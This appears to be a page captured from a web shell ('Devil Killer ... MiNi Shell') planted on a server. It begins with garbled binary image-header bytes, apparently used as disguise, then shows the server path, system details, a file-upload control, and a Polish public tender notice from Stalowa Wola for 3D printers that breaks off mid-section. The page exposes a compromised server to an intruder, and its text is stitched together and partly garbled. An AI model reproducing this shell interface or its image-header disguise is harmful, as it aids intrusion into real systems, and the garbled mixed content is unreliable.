JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221214/0049593201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa drukarek 3D wraz z akcesoriami i filamentami oraz długopisów 3D wraz z filamentami/wkładami na potrzeby projektu. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stalowowolskie Centrum Usług Wspólnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 384503002</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Jana Pawła II 25A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stalowa Wola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@stalowawola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.stalowawola.pl//?c=mdTresc-cmPokaz-1657</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa drukarek 3D wraz z akcesoriami i filamentami oraz długopisów 3D wraz z filamentami/wkładami na potrzeby projektu. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d441565b-7ba7-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00495932</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d441565b-7ba7-11ed-b4ea-f64d350121d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ezamowienia.gov.pl <br/>Szczegółowa instrukcja dotycząca składania ofert dostępna jest pod adresem https://epzpygmggrsicd.blob.core.windows.net/pod/2021/10/Oferty-3.2_20211016.pdf</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym (SCUW) a Wykonawcami odbywa się przy użyciu platformy e-zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl.<br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>15.	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: bzielinska@stalowawola.pl lub zp@stalowawola.pl.<br/>16.	Osoby ze strony zamawiającego upoważnione do kontaktowania się<br/>z Wykonawcami są: Barbara Zielińska – Dział Zamówień Publicznych Stalowowolskiego Centrum Usług Wspólnych Al. Jana Pawła II 25A; tel. (15) 819-47-48, adres email: bzielinska@stalowawola.pl lub zp@stalowawola.pl - w sprawach proceduralnych; <br/>17.	Zamawiający udziela odpowiedzi wszystkim Wykonawcom poprzez zamieszczenie stosownych odpowiedzi na platformie e-zamówienia https://ezamowienia.gov.pl.,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>2.	Administratorem Pana/Pani danych osobowych, przetwarzanych w Centrum Aktywności Seniora w Stalowej Woli (nazwa podmiotu), mający siedzibę w Stalowej Woli ul. Aleje Jana Pawła II 10, 37-450 Stalowa Wola (adres podmiotu).<br/>3.	Wyjaśnień w sprawach dotyczących przetwarzania danych osobowych udziela Inspektor Ochrony Danych, z którym można skontaktować się pod adresem e mail: iod@zuzmak.com lub numerem telefonu +48 537752318, a także pocztą tradycyjną pod adresem ul. Aleje Jana Pawła II 10, 37-450 Stalowa Wola z dopiskiem „Do Inspektora Ochrony Danych”.<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Dostawa drukarek 3D wraz z akcesoriami i filamentami oraz długopisów 3D wraz z filamentami/wkładami na potrzeby projektu” prowadzonym w trybie podstawowym zgodnie z art. 275 pkt 1 ustawy Pzp w ramach projektu pn.: „MODELOWE ROZWIĄZANIA NA TRUDNE WYZWANIA – Plan Rozwoju Lokalnego i Instytucjonalnego Stalowej Woli”, dofinansowanego z Norweskiego Mechanizmu Finansowego 2014-2021 (85%) oraz z Budżetu Państwa (15%) i wdrażanego w ramach Programu Rozwój Lokalny.<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp.<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;	<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;	<br/>	posiada Pani/Pan:	<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;	<br/>	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP – II.271.225.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Część I – dostawa drukarek 3D wraz z akcesoriami i filamentami,<br/>•	Dostawa drukarki 3D – TYP 1 wraz z akcesoriami, o parametrach technicznych nie gorszych niż wskazane poniżej<br/><br/>Nazwa/rodzaj wymaganego towaru/parametru	Minimalne wymagania odnośnie towaru/parametrów<br/>Liczba szt. drukarek 3D – TYP 1	1 szt.<br/>Możliwość przestrzennego drukowania obiektów trójwymiarowych.	TAK<br/>Drukarka 3D wyposażona w ekran LCD dotykowy TAK<br/>Technologia druku 3D	Zgodna z co najmniej jedną z następujących: FDM/LPD/FFF<br/>Powierzchnia druku	Co najmniej 200 x 200 x 180 mm<br/>Poziomowanie platformy roboczej automatyczne	TAK<br/>Platforma robocza podgrzewana	TAK<br/>Wymienna platforma robocza gładka	1 szt.<br/>Wymienna platforma robocza teksturowa	1 szt.<br/>Ekstruder z napędem direct	TAK<br/>Liczba ekstruderów	1 szt.<br/>System chłodzenia ekstrudera i wydruku	Co najmniej 1 wentylator chłodzący blok ekstrudera i 2 wentylatory chłodzące wydruk<br/>Maksymalna temperatura druku (ekstrudera)	290 ºC<br/>Maksymalna temperatura platformy 105 ºC<br/>Możliwość montażu dysz o różnej średnicy	TAK<br/>Średnica dyszy bazowej	0,4 mm – 1 szt.<br/>Rozdzielczość warstwy dla dyszy 0,4 mm	W zakresie 90-390 mikronów<br/>Minimalna grubość ściany dla dyszy 0,4 mm	450 mikronów<br/>Dodatkowa wymienna dysza - typ 1 o średnicy	0,3 mm – 1 szt.<br/>Dodatkowa wymienna dysza - typ 2 o średnicy	0,6 mm – 1 szt.<br/>Czujnik filamentu	TAK<br/>Wstrzymywanie wydruku po wykryciu końca filamentu	TAK<br/>Obsługiwane materiały do druku różnych producentów Co najmniej PLA, PET-G, ABS, PC, PA<br/>Średnica obługiwanego filamentu	Co najmniej obsługa filamentów o średnicy 1,75 mm<br/>Dedykowana, oryginalna obudowa drukarki, wyposażona w filtr cząstek stałych w klasie minimum H13	TAK<br/>Kamera umożliwiająca monitorowanie zdalnie procesu drukowania	TAK<br/>Łączność	Co najmniej: Wi-Fi, Ethernet, USB<br/>Obsługiwane typy plików wejściowych Co najmniej .stl, .obj, .dxf, .3mf, .ply<br/>Obsługiwane systemy operacyjne Minimum Mac OS Mojave i nowsze, Windows 7 i nowsze<br/>Dołączone oprogramowanie niezbędne do korzystania z drukarki 3D	TAK<br/>Dołączony kabel sieciowy	TAK<br/>Dołączony filament testowy PLA pasujący do drukarki 3D – TYP 1	1 szt. o wadze minimum 0,8 kg i średnicy 1,75 mm<br/>Udostępnione niezbędne instrukcje i materiały dotyczące użytkowania w języku polskim	TAK<br/>Deklaracja zgodności CE (deklaracja Conformité Européenne) - dokument potwierdzający należy dostarczyć na etapie dostawy	TAK<br/>Gwarancja - Dokument potwierdzający gwarancję należy dostarczyć na etapie dostawy	Co najmniej 12 miesięcy od daty dostawy<br/>Wsparcie techniczne dotyczące obsługi, eksploatacji urządzenia (min. e-mail)	Świadczone przez co najmniej 5 lat od daty dostawy<br/><br/>•	Dostawa drukarki 3D – TYP 2 wraz z akcesoriami, o parametrach technicznych nie gorszych niż wskazane poniżej<br/><br/>Nazwa/rodzaj wymaganego towaru/parametru	Minimalne wymagania odnośnie towaru/parametrów<br/>Liczba szt. drukarek 3D – TYP 2	1 szt.<br/>Możliwość przestrzennego drukowania obiektów trójwymiarowych.	TAK<br/>Drukarka 3D wyposażona w ekran LCD dotykowy TAK<br/>Technologia druku 3D	Zgodna z co najmniej jedną z następujących: FDM/LPD/FFF<br/>Powierzchnia druku	Co najmniej 250 x 210 x 200 mm<br/>Poziomowanie platformy roboczej automatyczne	TAK<br/>Platforma robocza podgrzewana	TAK<br/>Wymienna platforma robocza gładka	1 szt.<br/>Wymienna platforma robocza teksturowa	1 szt.<br/>Ekstruder z napędem direct	TAK<br/>Liczba ekstruderów	<br/>1 szt.<br/><br/>System chłodzenia ekstrudera i wydruku	Co najmniej 1 wentylator chłodzący blok ekstrudera i 2 wentylatory chłodzące wydruk<br/>Maksymalna temperatura druku	300 ºC<br/>Maksymalna temperatura platformy 120 ºC<br/>Możliwość montażu dysz o różnej średnicy	TAK<br/>Średnica dyszy bazowej	0,4 mm – 1 szt.<br/>Wysokość warstwy	W zakresie 0,05-0,35 mm<br/>Czujnik filamentu	TAK<br/>Wstrzymywanie wydruku po wykryciu końca filamentu	TAK<br/>Obsługiwane materiały do druku różnych producentów Co najmniej PLA, PET-G, ABS, PC, ASA, PP, nGen, Nylon, Woodfill<br/>Średnica obługiwanego filamentu	Co najmniej obsługa filamentów o średnicy 1,75 mm<br/>Funkcja drukarki lub dedykowane urządzenie do drukarki 3D, umożliwiające obsługę co najmniej 5 filamentów, podczas jednego wydruku, zapobiegające plątaniu się filamentu, kompatybilne co najmniej z filamentami typu PLA, ABS, PETG.	TAK<br/>Dedykowana, oryginalna obudowa drukarki, wyposażona w filtr cząstek stałych w klasie minimum H13, ekran sterowania LCD zainstalowany na zewnątrz i zamek mechaniczny, zapewniająca stabilne warunki do drukowania w podwyższonych temperaturach	TAK<br/>Łączność	Co najmniej: Wi-Fi, Ethernet, USB<br/>Obsługiwane typy plików wejściowych Co najmniej .stl, .obj, .dxf, .3mf, .ply<br/>Obsługiwane systemy operacyjne Minimum Mac OS Mojave i nowsze, Windows 7 i nowsze<br/>Dołączone oprogramowanie niezbędne do korzystania z drukarki 3D	TAK<br/>Dołączony kabel sieciowy	TAK<br/>Dołączony filament testowy PLA pasujący do drukarki 3D – TYP 2	1 szt. o wadze minimum 0,8 kg i średnicy 1,75 mm<br/>Udostępnione niezbędne instrukcje i materiały dotyczące użytkowania w języku polskim	TAK<br/>Deklaracja zgodności CE (deklaracja Conformité Européenne) - dokument potwierdzający należy dostarczyć na etapie dostawy	TAK<br/>Gwarancja - Dokument potwierdzający gwarancję należy dostarczyć na etapie dostawy	Co najmniej 12 miesięcy od daty dostawy<br/>Wsparcie techniczne dotyczące obsługi, eksploatacji urządzenia (min. e-mail)	Świadczone przez co najmniej 5 lat od daty dostawy<br/><br/>•	Dostawa filamentów pasujących do oferowanych drukarek 3D, o parametrach technicznych nie gorszych niż wskazane poniżej<br/><br/>Nazwa/rodzaj wymaganego towaru/parametru	Minimalne wymagania odnośnie towaru/parametrów<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor CZARNY	5 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor BIAŁY	5 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor CZERWONY	5 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor SZARY	5 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor NIEBIESKI	3 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor ŻÓŁTY	3 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor ZIELONY	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor POMARAŃCZOWY	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PLA pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor BRĄZOWY	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PET-G pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor CZARNY	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PET-G pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor BIAŁY	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PET-G pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor CZERWONY	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PET-G pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor SZARY	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PET-G pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor NIEBIESKI	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PET-G pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor ZIELONY	2 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/>Filament PET-G pasujący do drukarek 3D TYP 1 i 2 oraz suszarki do filamentów - kolor BRĄZOWY	1 szt. o wadze minimum 1 kg i średnicy 1,75 mm<br/><br/>•	Dostawa suszarki do filamentu, o parametrach technicznych nie gorszych niż wskazane poniżej<br/><br/>Nazwa/rodzaj wymaganego towaru/parametru	Minimalne wymagania odnośnie towaru/parametrów<br/>Suszarka do filamentu z przestrzennym ogrzewaniem 360º	1 szt.<br/>Wyposażona w dolną i górną płytę grzewczą z temperaturą grzania w zakresie co najmniej od 35 ºC do 70 ºC	TAK<br/>Wyposażona w ekran dotykowy LED umożliwiający dobór inteligentnych trybów suszenia dla różnych materiałów o średnicy co najmniej 1,75 mm i 2,85 mm	TAK<br/><br/>•	Dostawa kompletu drobnych akcesoriów pasujących do oferowanych drukarek 3D i filamentów, o parametrach technicznych nie gorszych niż wskazane poniżej<br/><br/>Nazwa/rodzaj wymaganego towaru/parametru	Minimalne wymagania odnośnie towaru/parametrów<br/>Śrubokręt	1 szt.<br/>Chwytak	1 szt.<br/>Nożyk do zdejmowania i obróbki wydruków	1 szt.<br/>Łopatka do zdejmowania i obróbki wydruków	1 szt.<br/>Pęseta do zbierania filamentu	1 szt.<br/>Cążki boczne do ucinania filamentu i usuwania podpór	1 szt.<br/>Szpachelka do odrywania wydruków	1 szt.<br/>Środek adhezyjny Opakowanie co najmniej 1 litr<br/>(można stosować mniejsze opakowania których suma da co najmniej 1 litr)<br/>Alkohol izopropylowy Opakowanie co najmniej 5 litrów<br/>(można stosować mniejsze opakowania których suma da co najmniej 5 litrów) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232100-5 - Drukarki i plotery</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ofercie maksimum 40 punktów, w tym kryterium. <br/>4.	Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium.<br/>5. Wynik – oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryterium) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 